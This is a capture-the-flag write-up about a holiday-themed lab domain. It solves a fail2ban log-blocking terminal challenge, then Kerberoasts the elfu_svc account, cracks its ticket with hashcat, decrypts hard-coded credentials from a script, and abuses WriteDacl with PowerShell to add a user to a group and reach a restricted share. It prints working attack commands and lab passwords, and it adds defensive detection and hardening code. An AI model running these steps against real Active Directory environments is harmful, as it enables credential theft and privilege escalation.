
Kerberoasting on an Open Fire

Challenge :
Obtain the secret sleigh research document from a host on the Elf University domain.
What is the first secret ingredient Santa urges each elf and reindeer to consider for a wonderful holiday season?
Start by registering as a student on the ElfU Portal. Find Eve Snowshoes in Santa's office for hints.
Difficulty Level : [image]
Location :
Santa’s Office
Elf/Troll :
Eve Snowshoes
Please note this objective was not near Eve Snowshoes, but since they provided such cool hints, I wanted to keep this elf here.
Hints from Eve Snowshoes : (Because we solved their terminal challenge “HoHo…No”)
  1. There's a great talk by Chris Davis on this exact subject!
  2. There are also plenty of resources available to learn more about Kerberoasting specifically.
  3. If you have any trouble finding the domain controller on the 10.X.X.X network, remember that, when not running as root, nmap default probing relies on connecting to TCP 80 and 443.
  4. Got a hash that won't crack with your wordlist? OneRuleToRuleThemAll.rule is a great way to grow your keyspace.
  5. Where'd you get your wordlist? CeWL might generate a great wordlist from the ElfU website, but it will ignore digits in terms by default.
Website:
https://register.elfu.org/register

We first solve the HoHo..No terminal challenge from Eve Snowshoes.

HoHo..No Terminal Challenge

This terminal challenge needs us to identify the malicious IP addresses in the logs and add them to the naughty list so they can be blocked using fail2ban.

There is an excellent talk by Mr. Andy Smith on fail2ban which immensely helped in solving this terminal challenge.

First find all the patterns of log entries in /var/log/hohono.log.
Exclude all the successful logins and valid heartbeats and put the others in ashish.log.

cat /var/log/hohono.log | grep -v -e "success" -e "Valid heartbeat" > ashish.log

Replace all the IP addresses in ashish.log with naughty_ip

sed -i -e 's/[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}/naughty_ip/g' ashish.log

Get only the messages

cat ashish.log | cut -d ' ' -f3- | sort | uniq

Sample unique log entries : [image]

Unique patterns of the log entries

Failed login from for user
Invalid heartbeat '' from
Login from rejected due to unknown user name
sent a malformed request

Now we can create the custom jail, and then the filter and action that the jail references.

Creating the custom jail

nano /etc/fail2ban/jail.d/my_jail.conf

Below would be the content of the my_jail.conf

[my_jail]
enabled = true
logpath = /var/log/hohono.log
findtime = 60m
maxretry = 10
bantime = 30m
filter = my_filter
action = my_action

Creating the custom filter

nano /etc/fail2ban/filter.d/my_filter.conf

Below would be the content of the my_filter.conf

[Definition]
failregex = <HOST> sent a malformed request$
            Failed login from <HOST>
            Login from <HOST> rejected due to unknown user name$
            Invalid heartbeat \S+ from <HOST>$

Creating the custom action

nano /etc/fail2ban/action.d/my_action.conf

Below would be the content of the my_action.conf.
Please note this is where the IP addresses we have identified get added to the naughty list so fail2ban bans them.

[Definition]
actionban   = /root/naughtylist add <ip>
actionunban = /root/naughtylist add <ip>

Restart the fail2ban service

service fail2ban restart

Refresh the naughtylist

./naughtylist refresh
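To see how the jail parameters (findtime = 60m, maxretry = 10) and the four failregex patterns combine, here is an added Python example; it is not part of the original writeup nor of fail2ban itself. It applies the same four patterns to a constructed set of log lines in the `date time message` layout that hohono.log uses (the first two fields being what the `cut -d ' ' -f3-` step strips) and reports which source addresses would reach maxretry inside findtime. The `<HOST>` substitution is simplified to an IPv4 pattern (fail2ban's real one also matches hostnames and IPv6), and the sample lines are constructed, not taken from the challenge log.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Simplified stand-in for fail2ban's <HOST> group: IPv4 only (assumption for this example).
HOST = r"(?P<host>\d{1,3}(?:\.\d{1,3}){3})"

# The four failregex lines from my_filter.conf, verbatim.
FAILREGEX = [
    r"<HOST> sent a malformed request$",
    r"Failed login from <HOST>",
    r"Login from <HOST> rejected due to unknown user name$",
    r"Invalid heartbeat \S+ from <HOST>$",
]
PATTERNS = [re.compile(p.replace("<HOST>", HOST)) for p in FAILREGEX]

# Jail parameters from my_jail.conf.
FINDTIME = timedelta(minutes=60)
MAXRETRY = 10

# Constructed sample log (not the real hohono.log):
#  - 10.0.0.5: 12 failed logins inside 22 minutes  -> should be banned
#  - 10.0.0.6: only successes / valid heartbeats     -> ignored
#  - 10.0.0.7: 3 distinct failure types              -> below maxretry
#  - 10.0.0.8: 11 failures, but one every 20 minutes -> never 10 inside one 60-minute window
SAMPLE_LOG = (
    [f"2021-12-17 10:{i:02d}:00 Failed login from 10.0.0.5 for user santa" for i in range(0, 24, 2)]
    + ["2021-12-17 10:05:00 Login from 10.0.0.6 successful for user elf",
       "2021-12-17 10:06:00 Valid heartbeat from 10.0.0.6",
       "2021-12-17 10:07:00 10.0.0.7 sent a malformed request",
       "2021-12-17 10:08:00 Invalid heartbeat 'xx' from 10.0.0.7",
       "2021-12-17 10:09:00 Login from 10.0.0.7 rejected due to unknown user name"]
    + [f"2021-12-17 {10 + i // 3:02d}:{(i % 3) * 20:02d}:30 Failed login from 10.0.0.8 for user eve"
       for i in range(11)]
)


def parse_line(line):
    """Split 'YYYY-MM-DD HH:MM:SS message' into (timestamp, message)."""
    date, time, msg = line.split(" ", 2)
    return datetime.fromisoformat(f"{date} {time}"), msg


def match_failure(msg):
    """Return the offending host if the message matches any failregex, else None."""
    for pat in PATTERNS:
        m = pat.search(msg)
        if m:
            return m.group("host")
    return None


def find_bans(lines, findtime=FINDTIME, maxretry=MAXRETRY):
    """Return the set of hosts with at least `maxretry` failures inside any `findtime` window."""
    failures = defaultdict(list)
    for line in lines:
        ts, msg = parse_line(line)
        host = match_failure(msg)
        if host:
            failures[host].append(ts)

    banned = set()
    for host, stamps in failures.items():
        stamps.sort()
        window = []
        for ts in stamps:
            window.append(ts)
            # Drop failures older than findtime relative to the newest one.
            while ts - window[0] > findtime:
                window.pop(0)
            if len(window) >= maxretry:
                banned.add(host)
                break
    return banned


if __name__ == "__main__":
    for host in sorted(find_bans(SAMPLE_LOG)):
        print(f"would ban {host}")
```

The 10.0.0.8 case is the one to notice: it produces more total failures than maxretry, yet is never banned because they are spread wider than findtime. When tuning a jail, decide whether a slow, patient source like that should be caught too, and widen findtime or lower maxretry accordingly.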

Achievement unlocked : [image]

Now we move on to Objective 8, Kerberoasting.

Registration and SSH to elfu.local domain

We register on https://register.elfu.org/register using a custom domain.
We are provided a domain user named rflkkildwi and the password for it.

SSH to grades.elfu.local as rflkkildwi : [image]

We see the below menu: [image]

We escape the menu using Ctrl+D, which drops us into a Python prompt.
Once in Python, use the below to spawn an interactive bash shell.

import pty; pty.spawn("/bin/bash")  

Conduct reconnaissance :
Username and hostname : [image]
Local IP : [image]
Get the neighbours; there are 4 of them : [image]

Conduct an nmap scan of the top 10 ports on each of those hosts to learn what services are running there.
It looks like 172.17.0.4 and 172.17.0.5 are running SMB and may have shared folders.

nmap --top-ports 10 172.17.0.4
nmap --top-ports 10 172.17.0.5

We look for shared folders on 172.17.0.4 and 172.17.0.5.
It looks like 172.17.0.5 has two shared folders, but the user rflkkildwi does not have access to these shares:

  1. \\172.17.0.5\elfu_svc_shr
  2. \\172.17.0.5\research_dep

Request TGS tickets for the users in Hashcat format. Each ticket is encrypted with a key derived from the account's password, so it can be brute-forced offline.
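From the defender's side, the request just described shows up on the domain controller as Security event 4769 (a Kerberos service ticket was requested) with TicketEncryptionType 0x17 (RC4-HMAC), the encryption type that hashcat mode 13100 cracks. The following Python example is added here and is not part of the original writeup; it runs two detection rules over a constructed set of 4769 records. The field names TargetUserName, ServiceName, TicketEncryptionType, IpAddress and Status are the event's real fields, while the values and the `time` key are constructed. Rule 1 flags every RC4 service ticket issued for a user-type service account; rule 2 flags any requester that collects tickets for several such services within a short window, which generalizes beyond the single elfu_svc case in the text.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Kerberos encryption types as logged in the TicketEncryptionType field of event 4769.
RC4_HMAC = 0x17   # etype 23: keyed from the account's NT hash, hence crackable offline (hashcat -m 13100)
AES128 = 0x11
AES256 = 0x12


def evt(time, user, service, etype, ip="::ffff:172.17.0.3"):
    """Build one constructed 4769 record carrying only the fields the detection reads."""
    return {"time": datetime.fromisoformat(time), "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip, "Status": 0x0}


# Constructed sample (illustrative, not real telemetry).
SAMPLE_4769 = [
    evt("2021-12-17T10:00:01", "rflkkildwi@ELFU.LOCAL", "elfu_svc", RC4_HMAC),
    evt("2021-12-17T10:00:01", "rflkkildwi@ELFU.LOCAL", "svc_backup", RC4_HMAC),
    evt("2021-12-17T10:00:02", "rflkkildwi@ELFU.LOCAL", "svc_sql", RC4_HMAC),
    evt("2021-12-17T10:00:02", "rflkkildwi@ELFU.LOCAL", "DC01$", AES256),     # machine ticket: normal
    evt("2021-12-17T09:30:00", "alice@ELFU.LOCAL", "krbtgt", AES256),         # TGT renewal: normal
    evt("2021-12-17T11:15:00", "bob@ELFU.LOCAL", "svc_sql", RC4_HMAC, ip="::ffff:172.17.0.9"),
]


def is_user_service_account(service_name):
    """Machine accounts end in '$' and krbtgt is the TGT service; neither is a Kerberoasting target."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def detect_kerberoasting(events, window=timedelta(minutes=5), threshold=3):
    """
    Rule 1: every successful RC4 service ticket for a user-type service account is a finding
            (user, service, source IP).
    Rule 2: a requester that obtains tickets for >= threshold distinct such services inside
            `window` is a suspected roaster.
    Returns (rc4_findings, suspected_roasters).
    """
    rc4_findings = []
    per_requester = defaultdict(list)
    for e in events:
        if e["Status"] != 0x0 or e["TicketEncryptionType"] != RC4_HMAC:
            continue
        if not is_user_service_account(e["ServiceName"]):
            continue
        rc4_findings.append((e["TargetUserName"], e["ServiceName"], e["IpAddress"]))
        per_requester[e["TargetUserName"]].append((e["time"], e["ServiceName"]))

    suspected = set()
    for user, reqs in per_requester.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(services) >= threshold:
                suspected.add(user)
                break
    return rc4_findings, suspected


if __name__ == "__main__":
    findings, roasters = detect_kerberoasting(SAMPLE_4769)
    for user, svc, ip in findings:
        print(f"RC4 service ticket: {user} -> {svc} from {ip}")
    for user in sorted(roasters):
        print(f"suspected Kerberoasting burst by {user}")
```

A single RC4 ticket (bob's request above) is low signal on its own, since legacy clients still negotiate RC4; the burst rule is what separates a tooling run from background noise. The durable fix is on the account side: restrict service accounts to AES via msDS-SupportedEncryptionTypes and give them long random passwords (or use group managed service accounts), so a cracked ticket like the one in this writeup is no longer feasible.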

Cracking the TGS hash for elfu.local\elfu_svc to get plaintext password

Downloading the OneRuleToRuleThemAll.rule

We have the TGS hash for elfu_svc from the previous step.
We copy the hash to the local Kali machine as hash.txt.
We download OneRuleToRuleThemAll.rule from here.

wget -O OneRuleToRuleThemAll.rule https://raw.githubusercontent.com/NotSoSecure/password_cracking_rules/master/OneRuleToRuleThemAll.rule

Generate the word list

Generate the word list using CeWL with the --with-numbers option so it does not ignore digits.

cewl --with-numbers https://register.elfu.org/register  > wordlist.txt

Crack the TGS hash using Hashcat

Now we use the OneRuleToRuleThemAll.rule and wordlist.txt with Hashcat.

hashcat -m 13100 -a 0 hash.txt --potfile-disable -r OneRuleToRuleThemAll.rule --force -O -w 4 --opencl-device-types 1,2 wordlist.txt

We have the plaintext password for elfu_svc: Snow2021!

Enumerate the file share "elfu_svc_shr" and get hard coded creds for remote_elf in the script

smbclient \\\\172.17.0.5\\elfu_svc_shr -U elfu_svc

Enter the password "Snow2021!" (without quotes).
Now we are able to enumerate all the files.

Check for any hard coded passwords.

# Turn the prompt off so mget does not ask for each file
prompt OFF
# Download all the files
mget *
# Exit out of smbclient
exit
# Grep for ConvertTo-SecureString in all the files, since that is what scripts use to turn plain-text creds into secure strings
grep -C 2 ConvertTo-SecureString *


It looks like GetProcessInfo.ps1 has the hard-coded credentials for another domain user named elfu.local\remote_elf for the host 10.128.1.53.
The credentials look encrypted, though, so we need to convert them to plain text.


Get the password for the elfu.local\remote_elf

Run this in a PowerShell 7 terminal.

$key = (2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7)
$SecStringPassword = "76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
$aPass = $SecStringPassword | ConvertTo-SecureString -Key $key
ConvertFrom-SecureString -SecureString $aPass -AsPlainText 

We have the password for elfu.local\remote_elf:
A1d655f7f5d98b10!

Logon To Domain controller (DC01) using elfu.local\remote_elf

At this point we have the password for elfu.local\remote_elf which is A1d655f7f5d98b10!.
But this user also does not have access to \\172.17.0.5\research_dep.
So, we may need to escalate privileges of our user (rflkkildwi) and let's see if we can leverage elfu.local\remote_elf for that.

Let's log in to the host 10.128.1.53 using elfu.local\remote_elf.
First enter PowerShell:

pwsh


Get the PSCredential object using the secure string.

# Setting up the creds
$SecStringPassword = "76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
$aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)


Using the creds above, create a new PowerShell session on 10.128.1.53

New-PSSession -Computer 10.128.1.53 -Credential $aCred

A new PowerShell session is created with id 1.

We enter the PowerShell session on 10.128.1.53, whose hostname is DC01; checking with Get-ADDomainController confirms it is a domain controller.

Enter-PSSession -Id 1
Get-ADDomainController -Discover -domain "elfu.local" -Service "PrimaryDC","TimeService"


Privilege Escalation

This involves escalating privileges of our user "rflkkildwi".
We do this by adding this user to "Research Department" AD group leveraging elfu.local\remote_elf.

Find an AD group on which the user elfu.local\remote_elf has WriteDacl permission.
We tried Domain Admins first; remote_elf does not have WriteDacl permission on it.

$ADSI = [ADSI]"LDAP://CN=Domain Admins,CN=Users,DC=elfu,DC=local"
$ADSI.psbase.ObjectSecurity.GetAccessRules($true,$true,[Security.Principal.NTAccount]) 

So, we enumerate all the groups to see if something interesting comes up.

Get-ADGroup to get all AD groups : [image]
This "Research Department" group looks interesting : [image]

We list all the access rules for Research Department and can see that remote_elf has WriteDacl permission on that group.

$ADSI = [ADSI]"LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local" 
$ADSI.psbase.ObjectSecurity.GetAccessRules($true,$true,[Security.Principal.NTAccount])


Using remote_elf, add "GenericAll" permission for the user "rflkkildwi" to the identified AD group.

Add-Type -AssemblyName System.DirectoryServices
$ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
$username = "rflkkildwi"
$nullGUID = [guid]'00000000-0000-0000-0000-000000000000'
$propGUID = [guid]'00000000-0000-0000-0000-000000000000'
$IdentityReference = (New-Object System.Security.Principal.NTAccount("elfu.local\$username")).Translate([System.Security.Principal.SecurityIdentifier])
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] "GenericAll"), ([System.Security.AccessControl.AccessControlType] "Allow"), $propGUID, $inheritanceType, $nullGUID
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
$secOptions = $domainDirEntry.get_Options()
$secOptions.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
$domainDirEntry.RefreshCache()
$domainDirEntry.get_ObjectSecurity().AddAccessRule($ACE)
$domainDirEntry.CommitChanges()
$domainDirEntry.dispose()

We can verify that the GenericAll permission has been added for user "rflkkildwi" on the AD group "Research Department".

$ADSI = [ADSI]"LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local" 
$ADSI.psbase.ObjectSecurity.GetAccessRules($true,$true,[Security.Principal.NTAccount])


Using remote_elf, add user "rflkkildwi" to the identified AD group.

Add-Type -AssemblyName System.DirectoryServices
$ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
$username = "rflkkildwi"
$password = "Pvwevsviq#"
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $password
$user = New-Object System.Security.Principal.NTAccount("elfu.local\$username")
$sid=$user.Translate([System.Security.Principal.SecurityIdentifier])
$b=New-Object byte[] $sid.BinaryLength
$sid.GetBinaryForm($b,0)
$hexSID=[BitConverter]::ToString($b).Replace('-','')
$domainDirEntry.Add("LDAP://<SID=$hexSID>")
$domainDirEntry.CommitChanges()
$domainDirEntry.dispose()

We can verify that the user "rflkkildwi" has been added to the "Research Department" group.

Get-ADGroupMember -Identity 'ResearchDepartment' | Where-Object {$_.name -eq "rflkkildwi"}


Access the secret document

At this point rflkkildwi is added to the "Research Department" group.
So now we can access the document in the share '\\172.17.0.5\research_dep' using "rflkkildwi".

smbclient '\\172.17.0.5\research_dep'


We can also download the PDF from the share to grades.elfu.local.

Change the shell to /bin/bash on the grades.elfu.org session.
Enter chsh to change your shell to /bin/bash.

chsh


From the local Kali box, download the document from grades.elfu.org.

Open the PDF locally to see the 1st secret ingredient – kindness.
We use that as the answer for the objective, and the objective is completed.